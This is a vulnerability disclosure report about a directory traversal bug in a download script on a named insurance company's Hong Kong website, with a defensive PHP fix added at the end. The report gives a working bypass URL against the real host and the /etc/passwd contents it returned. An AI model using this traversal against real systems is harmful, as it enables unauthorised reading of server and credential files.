2015-12-14: Details sent to the vendor, awaiting vendor handling
2015-12-17: Vendor confirmed; details disclosed to the vendor only
2015-12-27: Details disclosed to core white hats and relevant domain experts
2016-01-06: Details disclosed to regular white hats
2016-01-16: Details disclosed to intern white hats
2016-01-28: Details disclosed to the public
As titled.
Target: http://www.hk.cntaiping.com, with download URLs of the form
http://www.hk.cntaiping.com/include/getfile.php?filepath=<path>&file=<name>.<ext>&filename=<name>
Database configuration information
----------------------------------------------------------------------------------
In include/getfile.php:

    $path = '../';
    // Single-pass blacklist: each "../" is removed exactly once, so a string such as
    // "....//" collapses to "../" after the removal and still traverses.
    $filepath = str_replace("../", "", $filepath);
    $file = str_replace("../", "", $file);
    // The only check is that the concatenated path names an existing file;
    // nothing verifies that it lies under the intended download root.
    if (is_file($path.$filepath.$file)) {
        $filerename = $filename;
        $file = $file;
        $path = $path.$filepath;
        $can_download = true;
    }

There is a check against directory traversal, but it can be bypassed, as follows:
http://www.hk.cntaiping.com/include/getfile.php?filepath=....//....//....//etc/&file=passwd&filename=passwd
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:50:104:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hal:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-BUS:/var/run/dbus:/bin/false
mysql:x:60:106:MySQL database admin:/var/lib/mysql:/bin/bash
named:x:44:44:Name server daemon:/var/lib/named:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:103:NTP daemon:/var/lib/ntp:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:102:105:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
webapp:x:1001:100:webapp:/srv/www/htdocs:/bin/bash

You know the rest.
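The following is an added example, not code from cntaiping.com or from the original report. It reproduces the single-pass str_replace filter to show why "....//" survives as "../", and beside it gives a resolver that canonicalises the requested path with realpath() and only serves files that stay under the download root. The function names (naive_strip, safe_resolve), the temporary directory layout and the file names are constructed for the demonstration.

```php
<?php
// Added example; the directory layout and file names below are constructed.

// The filter pattern from the report: one pass of str_replace, no canonicalisation.
function naive_strip(string $s): string {
    return str_replace("../", "", $s);
}

// Hardened replacement: resolve the real path and require it to be inside $base.
// Returns the canonical path on success, or null if the request must be refused.
function safe_resolve(string $base, string $filepath, string $file): ?string {
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // Refuse NUL bytes explicitly rather than relying on the filesystem functions.
    if (strpos($filepath . $file, "\0") !== false) {
        return null;
    }
    // realpath() resolves "..", symlinks and duplicate separators against the
    // real filesystem, so encoding tricks in the input no longer matter.
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $filepath . $file);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Compare with a trailing separator so that a sibling directory whose name
    // merely starts with the base name (e.g. "downloads2") is not accepted.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed layout: one public file under the download root, one file outside it.
$base = sys_get_temp_dir() . "/getfile-demo-" . getmypid();
mkdir("$base/downloads", 0700, true);
file_put_contents("$base/downloads/report.pdf", "public");
file_put_contents("$base/secret.txt", "internal");

// 1. The blacklist filter: a plain "../" is stripped, but "....//" is reduced to "../".
foreach (["../", "....//"] as $input) {
    echo str_pad($input, 8), " -> '", naive_strip($input), "'\n";
}

// 2. The canonicalising resolver: the legitimate file is served, traversal is refused.
$cases = [
    ["", "report.pdf"],       // legitimate download
    ["../", "secret.txt"],    // resolves outside the root, rejected by the prefix check
    ["....//", "secret.txt"], // no such directory under the root, realpath() fails
];
foreach ($cases as [$fp, $f]) {
    $result = safe_resolve("$base/downloads", $fp, $f);
    echo str_pad($fp . $f, 20), " -> ", $result === null ? "refused" : "served", "\n";
}

// Remove the constructed files.
unlink("$base/secret.txt");
unlink("$base/downloads/report.pdf");
rmdir("$base/downloads");
rmdir($base);
```

The design point is that a removal-based blacklist has to be applied until a fixed point is reached and still misses encodings it does not know about, whereas resolving the path and checking the resolved prefix makes the decision on what the filesystem will actually open. Pair the prefix check with a whitelist of allowed extensions if the download root also contains scripts or configuration files.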
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-12-17 10:50
The site is a sub-site and involves some internal information.
None yet.